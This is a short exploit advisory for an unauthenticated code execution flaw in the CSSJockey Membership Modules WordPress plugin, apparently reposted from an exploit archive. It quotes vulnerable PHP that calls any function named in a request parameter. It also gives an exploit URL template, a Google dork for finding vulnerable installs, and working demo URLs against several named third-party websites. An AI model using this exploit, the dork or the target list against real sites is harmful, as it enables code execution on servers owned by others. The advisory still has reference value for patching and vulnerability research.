Wordpress Plugin CSSJockey Membership Modules Code Execution Vulnerability

Exploit Title : Wordpress Plugin CSSJockey Membership Modules Code Execution Vulnerability

Exploit Author : NULL_Pointer

Contact : https://www.facebook.com/xenith.gianni

Date : 20/09/2014

Vendor Homepage : http://www.cssjockey.com/shop/wordpress-plugin/front-end-membership-modules/

Google Dork : inurl:/wp-content/plugins/cj-membership-modules/

Tested on : Linux, Windows 7

--------------------------------------------------------------

Wordpress Plugin CSSJockey Membership Modules suffers from Code Execution Vulnerability.

Vulnerable Code on file '/framework/includes/admin_ajax.php' :

# if (isset ($_REQUEST['cj_action']) && $_REQUEST['cj_action'] != "") {
# 	$_REQUEST['cj_action']();
# }

you can execute some php functions.

Exploit : http://127.0.0.1/wp-content/plugins/cj-membership-modules/framework/includes/admin_ajax.php?cj_action=[FUNCTION]

Demo :

http://demo.cssjockey.com/wp-content/plugins/cj-membership-modules/framework/includes/admin_ajax.php?cj_action=phpinfo

http://petspress.org/wp-content/plugins/cj-membership-modules/framework/includes/admin_ajax.php?cj_action=phpinfo

https://www.unik-concierge.luxury/wp-content/plugins/cj-membership-modules/framework/includes/admin_ajax.php?cj_action=phpinfo

http://www.studybix.com/wp-content/plugins/cj-membership-modules/framework/includes/admin_ajax.php?cj_action=phpinfo

Proof Pic : http://img4.hostingpics.net/pics/2305819511.png

#  0day.today [2018-04-02]  #